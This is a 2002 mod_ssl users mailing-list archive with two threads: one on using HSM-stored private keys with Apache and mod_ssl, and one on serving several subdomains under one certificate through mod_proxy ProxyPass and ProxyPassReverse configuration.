From owner-modssl-users@modssl.org  Wed Jun 12 10:30:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA05984; Wed, 12 Jun 2002 10:29:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id KAA05867; Wed, 12 Jun 2002 10:28:14 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 673B94CE78F; Wed, 12 Jun 2002 10:28:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3A28928989; Wed, 12 Jun 2002 10:04:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from parmenion.hosting.pacbell.net id VAA26412; Tue, 11 Jun 2002 21:56:22 +0200 (MET DST)
Received: from IMRANPC (adsl-64-172-38-74.dsl.snfc21.pacbell.net [64.172.38.74])
	by parmenion.hosting.pacbell.net
	id PAA09429; Tue, 11 Jun 2002 15:56:15 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Imran Badr" 
To: 
Subject: RE: Hardware key storage
Date: Tue, 11 Jun 2002 12:54:44 -0700
Message-ID: <003c01c21181$d5cb2970$5010a8c0@IMRANPC>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <20020608145622.46cca426.francois@fdesar.net>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Imran Badr" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Engine support inlcudes offloading RSA/DSA operations but I haven't found
any way to notify moddssl that the key is in hardware key storage. Modssl
always looks for disk files for private key and certificate files and I
haven't figured out how to use hardware key storage. Apache will never start
if those files are not in disk.

Thanks for the reply.
Imran.



-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Francois Desarmenien
Sent: Saturday, June 08, 2002 5:56 AM
To: modssl-users@modssl.org
Subject: Re: Hardware key storage


Le Wed, 5 Jun 2002 19:18:26 -0700
"Imran Badr"  a ecrit:

> Hi,
> I am sorry if this question has been asked before in this group. I wanted
to
> find out what would be required to use private keys stored in hardware
with
> apache and modssl ? Modssl code looks for private key file in the host
> machine and calls use_private_key() sort of function of openssl to store
> private key in ssl context. Is it possible to use modssl with apache when
> keys are created in tamper proof hardware and never leaves that? Is there
> any patch to do that?

mod_ssl relies on OpenSSL and OpenSSL-engine handles access for some
cryto cards.

F.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 11:08:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10128; Wed, 12 Jun 2002 11:07:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id LAA10096; Wed, 12 Jun 2002 11:06:27 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXL5AK00.QT4 for ; Wed, 12 Jun 2002
          10:06:20 +0100 
Message-ID: <3D070F0B.1070108@itaction.co.uk>
Date: Wed, 12 Jun 2002 10:06:19 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Hardware key storage
References: <003c01c21181$d5cb2970$5010a8c0@IMRANPC>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Whether this can be done is something you should talk to the vendor of 
your HSM about. If you're still looking for one to buy, I can confirm 
that it can be done with nCipher's gear using openssl-engine and some 
extra binaries they provide, I personally have experience with Solaris 
and using an HSM protected key. They trick mod_ssl into running with a 
dummy key, and then openssl engine offloads the key transforms via their 
CHIL api.

At http://www.ncipher.com/resources/index.html you will find their 
whitepapers on the subject.

I work for an nCipher Solutions partner, so my view here is obviously 
biased, there are other HSM vendors apparently.

-PeterV.

Imran Badr wrote:

>Engine support inlcudes offloading RSA/DSA operations but I haven't found
>any way to notify moddssl that the key is in hardware key storage. Modssl
>always looks for disk files for private key and certificate files and I
>haven't figured out how to use hardware key storage. Apache will never start
>if those files are not in disk.
>
>Thanks for the reply.
>Imran.
>
>
>
>-----Original Message-----
>From: owner-modssl-users@modssl.org
>[mailto:owner-modssl-users@modssl.org]On Behalf Of Francois Desarmenien
>Sent: Saturday, June 08, 2002 5:56 AM
>To: modssl-users@modssl.org
>Subject: Re: Hardware key storage
>
>
>Le Wed, 5 Jun 2002 19:18:26 -0700
>"Imran Badr"  a ecrit:
>
>  
>
>>Hi,
>>I am sorry if this question has been asked before in this group. I wanted
>>    
>>
>to
>  
>
>>find out what would be required to use private keys stored in hardware
>>    
>>
>with
>  
>
>>apache and modssl ? Modssl code looks for private key file in the host
>>machine and calls use_private_key() sort of function of openssl to store
>>private key in ssl context. Is it possible to use modssl with apache when
>>keys are created in tamper proof hardware and never leaves that? Is there
>>any patch to do that?
>>    
>>
>
>mod_ssl relies on OpenSSL and OpenSSL-engine handles access for some
>cryto cards.
>
>F.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 11:19:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10671; Wed, 12 Jun 2002 11:18:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id LAA10662; Wed, 12 Jun 2002 11:17:56 +0200 (MET DST)
Received: (qmail 4007 invoked from network); 12 Jun 2002 09:17:53 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 09:17:53 -0000
Message-ID: <3D0711BB.1D9B4963@godden.net>
Date: Wed, 12 Jun 2002 11:17:47 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: 1 certificate for several sites using redirection ?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'd like to use a certificate to secure several of our subdomains...
buying hundreds of certificates is simply too expensive.
Is there some way to do this :

- Install certificate on secure.ourdomain.com
- Let people surf to
https://secure.ourdomain.com/other-subdomain.ourdomain.com/what-ever-page.html

Thanks in advance.


Greetings,

Wim Godden

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 11:25:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA11010; Wed, 12 Jun 2002 11:24:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id LAA10996; Wed, 12 Jun 2002 11:23:41 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXL63G00.ATK for ; Wed, 12 Jun 2002
          10:23:40 +0100 
Message-ID: <3D07131B.2040502@itaction.co.uk>
Date: Wed, 12 Jun 2002 10:23:39 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <3D0711BB.1D9B4963@godden.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You could do that using reverse proxy, ie mod_proxy.
Redirects are not going to help.

Wim Godden wrote:

>Hi,
>
>I'd like to use a certificate to secure several of our subdomains...
>buying hundreds of certificates is simply too expensive.
>Is there some way to do this :
>
>- Install certificate on secure.ourdomain.com
>- Let people surf to
>https://secure.ourdomain.com/other-subdomain.ourdomain.com/what-ever-page.html
>
>Thanks in advance.
>
>
>Greetings,
>
>Wim Godden
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 11:30:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA11329; Wed, 12 Jun 2002 11:29:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA11284; Wed, 12 Jun 2002 11:28:18 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g5C9Rw002538
	for ; Wed, 12 Jun 2002 10:28:03 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 12 Jun 2002 10:27:54 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020671CB@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: 1 certificate for several sites using redirection ?
Date: Wed, 12 Jun 2002 10:27:53 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

There's always the possibility of a wildcard certificate, but you'd need to
have the same domain name throughout. Some browsers don't work with them.

See www.thawte.com for details.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
> Sent: 12 June 2002 10:24
> To: modssl-users@modssl.org
> Subject: Re: 1 certificate for several sites using redirection ?
> 
> 
> You could do that using reverse proxy, ie mod_proxy.
> Redirects are not going to help.
> 
> Wim Godden wrote:
> 
> >Hi,
> >
> >I'd like to use a certificate to secure several of our subdomains...
> >buying hundreds of certificates is simply too expensive.
> >Is there some way to do this :
> >
> >- Install certificate on secure.ourdomain.com
> >- Let people surf to
> >https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
> at-ever-page.html
> >
> >Thanks in advance.
> >
> >
> >Greetings,
> >
> >Wim Godden
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 12:08:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA14045; Wed, 12 Jun 2002 12:07:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id MAA13465; Wed, 12 Jun 2002 12:06:24 +0200 (MET DST)
Received: (qmail 12458 invoked from network); 12 Jun 2002 10:06:21 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 10:06:21 -0000
Message-ID: <3D071D17.6629AC8@godden.net>
Date: Wed, 12 Jun 2002 12:06:15 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <3D0711BB.1D9B4963@godden.net> <3D07131B.2040502@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

proxypass /test http://other-subdomain.ourdomain.com
doesn't work properly... I get errors about the images being insecure and all links
point to the wrong position.


Peter Viertel wrote:

> You could do that using reverse proxy, ie mod_proxy.
> Redirects are not going to help.
>
> Wim Godden wrote:
>
> >Hi,
> >
> >I'd like to use a certificate to secure several of our subdomains...
> >buying hundreds of certificates is simply too expensive.
> >Is there some way to do this :
> >
> >- Install certificate on secure.ourdomain.com
> >- Let people surf to
> >https://secure.ourdomain.com/other-subdomain.ourdomain.com/what-ever-page.html
> >
> >Thanks in advance.
> >
> >
> >Greetings,
> >
> >Wim Godden
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande sites !


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 12:23:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA15244; Wed, 12 Jun 2002 12:22:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA15215; Wed, 12 Jun 2002 12:21:44 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g5CALO005354
	for ; Wed, 12 Jun 2002 11:21:29 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 12 Jun 2002 11:21:20 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: 1 certificate for several sites using redirection ?
Date: Wed, 12 Jun 2002 11:21:19 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sounds like you have some absolute links rather than relative links. You can
also use 
proxypass /test https://other-subdomain.ourdomain.com

If the data needs to be secured between the proxy and the destination
server.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Is the statement 'There is no such thing as truth'  true?


> -----Original Message-----
> From: Wim Godden [mailto:wim@godden.net]
> Sent: 12 June 2002 11:06
> To: modssl-users@modssl.org
> Subject: Re: 1 certificate for several sites using redirection ?
> 
> 
> proxypass /test http://other-subdomain.ourdomain.com
> doesn't work properly... I get errors about the images being 
> insecure and all links
> point to the wrong position.
> 
> 
> Peter Viertel wrote:
> 
> > You could do that using reverse proxy, ie mod_proxy.
> > Redirects are not going to help.
> >
> > Wim Godden wrote:
> >
> > >Hi,
> > >
> > >I'd like to use a certificate to secure several of our 
> subdomains...
> > >buying hundreds of certificates is simply too expensive.
> > >Is there some way to do this :
> > >
> > >- Install certificate on secure.ourdomain.com
> > >- Let people surf to
> > 
> >https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
at-ever-page.html
> >
> >Thanks in advance.
> >
> >
> >Greetings,
> >
> >Wim Godden
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
------
Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
sites !


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 13:52:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA19868; Wed, 12 Jun 2002 13:51:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id NAA19828; Wed, 12 Jun 2002 13:50:16 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GXLCVQ00.6S4 for ; Wed, 12 Jun 2002
          12:50:14 +0100 
Message-ID: <3D073574.3060301@itaction.co.uk>
Date: Wed, 12 Jun 2002 12:50:12 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

yes, i think thats whats happening - you need to review the website 
content you are pointing at. For this to work you can't have any 
absolute hrefs, and also the backend site may issue redirects, for these 
to work you need a ProxyPassReverse which will rewrite the Location: 
header on any redirects the backend site may send.

 For example:

ProxyPass /test    http://other.subdomain.ourdomain.com/
ProxyPassReverse /test  http://other.subdomain.ourdomain.com/

proxypassreverse unfortunately is not case insensitive, and the backend 
webserver may refer to itself canonically, so the location headers may 
have another hostname. Either fix up the backend webserver to match the 
proxypassreverse, or add extra proxypassreverse lines.

The most common cause of redirects is the / bug handlers of tomcat, and 
IIS which kick in if your url ends with / and that resolves to a 
directory, then the webserver looks up what the directoryindex script is 
(eg. index.html) and sends a redirect. This is something to do with 
early revision browser releases, I have no idea which ones or if it 
matters anymore.

Also note that mod_proxy got a big upgrade at apache release 1.3.23 that 
may help things along too in certain cases.

John.Airey@rnib.org.uk wrote:

>Sounds like you have some absolute links rather than relative links. You can
>also use
>proxypass /test https://other-subdomain.ourdomain.com
>
>If the data needs to be secured between the proxy and the destination
>server.
>
>-
>John Airey
>Internet systems support officer, ITCSD, Royal National Institute of the
>Blind,
>Bakewell Road, Peterborough PE2 6XU,
>Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
>
>Is the statement 'There is no such thing as truth'  true?
>
>
>  
>
>>-----Original Message-----
>>From: Wim Godden [mailto:wim@godden.net]
>>Sent: 12 June 2002 11:06
>>To: modssl-users@modssl.org
>>Subject: Re: 1 certificate for several sites using redirection ?
>>
>>
>>proxypass /test http://other-subdomain.ourdomain.com
>>doesn't work properly... I get errors about the images being
>>insecure and all links
>>point to the wrong position.
>>
>>
>>Peter Viertel wrote:
>>
>>    
>>
>>>You could do that using reverse proxy, ie mod_proxy.
>>>Redirects are not going to help.
>>>
>>>Wim Godden wrote:
>>>
>>>      
>>>
>>>>Hi,
>>>>
>>>>I'd like to use a certificate to secure several of our
>>>>        
>>>>
>>subdomains...
>>    
>>
>>>>buying hundreds of certificates is simply too expensive.
>>>>Is there some way to do this :
>>>>
>>>>- Install certificate on secure.ourdomain.com
>>>>- Let people surf to
>>>>        
>>>>
>>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
>>>      
>>>
>at-ever-page.html
>  
>
>>>Thanks in advance.
>>>
>>>
>>>Greetings,
>>>
>>>Wim Godden
>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>      
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>    
>>
>
>--
>------
>Adverteren.be - 100% Nederlandstalig adverteren op kwalitatief hoogstaande
>sites !
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>-
>
>NOTICE: The information contained in this email and any attachments is
>confidential and may be legally privileged. If you are not the
>intended recipient you are hereby notified that you must not use,
>disclose, distribute, copy, print or rely on this email's content. If
>you are not the intended recipient, please notify the sender
>immediately and then delete the email and any attachments from your
>system.
>
>RNIB has made strenuous efforts to ensure that emails and any
>attachments generated by its staff are free from viruses. However, it
>cannot accept any responsibility for any viruses which are
>transmitted. We therefore recommend you scan all attachments.
>
>Please note that the statements and views expressed in this email
>and any attachments are those of the author and do not necessarily
>represent those of RNIB.
>
>RNIB Registered Charity Number: 226227
>
>Website: http://www.rnib.org.uk
>
>14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
>find out all about it.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 12 14:11:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21094; Wed, 12 Jun 2002 14:10:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from godden.net id OAA20983; Wed, 12 Jun 2002 14:09:05 +0200 (MET DST)
Received: (qmail 32101 invoked from network); 12 Jun 2002 12:09:01 -0000
Received: from unknown (HELO godden.net) (10.0.0.3)
  by 0 with SMTP; 12 Jun 2002 12:09:01 -0000
Message-ID: <3D0739D7.9657779A@godden.net>
Date: Wed, 12 Jun 2002 14:08:55 +0200
From: Wim Godden 
Organization: FirstLink Networks
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 1 certificate for several sites using redirection ?
References: <9B66BBD37D5DD411B8CE00508B69700F020671CC@pborolocal.rnib.org.uk> <3D073574.3060301@itaction.co.uk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Wim Godden 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

So there's no system which allows me to really proxy pages and 'modify' them so
that all future connections go through this 'proxy' as well ?

Greetings,

Wim

Peter Viertel wrote:

> yes, i think thats whats happening - you need to review the website
> content you are pointing at. For this to work you can't have any
> absolute hrefs, and also the backend site may issue redirects, for these
> to work you need a ProxyPassReverse which will rewrite the Location:
> header on any redirects the backend site may send.
>
>  For example:
>
> ProxyPass /test    http://other.subdomain.ourdomain.com/
> ProxyPassReverse /test  http://other.subdomain.ourdomain.com/
>
> proxypassreverse unfortunately is not case insensitive, and the backend
> webserver may refer to itself canonically, so the location headers may
> have another hostname. Either fix up the backend webserver to match the
> proxypassreverse, or add extra proxypassreverse lines.
>
> The most common cause of redirects is the / bug handlers of tomcat, and
> IIS which kick in if your url ends with / and that resolves to a
> directory, then the webserver looks up what the directoryindex script is
> (eg. index.html) and sends a redirect. This is something to do with
> early revision browser releases, I have no idea which ones or if it
> matters anymore.
>
> Also note that mod_proxy got a big upgrade at apache release 1.3.23 that
> may help things along too in certain cases.
>
> John.Airey@rnib.org.uk wrote:
>
> >Sounds like you have some absolute links rather than relative links. You can
> >also use
> >proxypass /test https://other-subdomain.ourdomain.com
> >
> >If the data needs to be secured between the proxy and the destination
> >server.
> >
> >-
> >John Airey
> >Internet systems support officer, ITCSD, Royal National Institute of the
> >Blind,
> >Bakewell Road, Peterborough PE2 6XU,
> >Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk
> >
> >Is the statement 'There is no such thing as truth'  true?
> >
> >
> >
> >
> >>-----Original Message-----
> >>From: Wim Godden [mailto:wim@godden.net]
> >>Sent: 12 June 2002 11:06
> >>To: modssl-users@modssl.org
> >>Subject: Re: 1 certificate for several sites using redirection ?
> >>
> >>
> >>proxypass /test http://other-subdomain.ourdomain.com
> >>doesn't work properly... I get errors about the images being
> >>insecure and all links
> >>point to the wrong position.
> >>
> >>
> >>Peter Viertel wrote:
> >>
> >>
> >>
> >>>You could do that using reverse proxy, ie mod_proxy.
> >>>Redirects are not going to help.
> >>>
> >>>Wim Godden wrote:
> >>>
> >>>
> >>>
> >>>>Hi,
> >>>>
> >>>>I'd like to use a certificate to secure several of our
> >>>>
> >>>>
> >>subdomains...
> >>
> >>
> >>>>buying hundreds of certificates is simply too expensive.
> >>>>Is there some way to do this :
> >>>>
> >>>>- Install certificate on secure.ourdomain.com
> >>>>- Let people surf to
> >>>>
> >>>>
> >>>https://secure.ourdomain.com/other-subdomain.ourdomain.com/wh
> >>>
> >>>
> >at-ever-page.html
> >
> >
> >>>Thanks in advance.
> >>>
> >>>
> >>>Greetings,
> >>>
> >>>Wim Godden
> >>>
> >>>______________________________________________________________________
> >>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
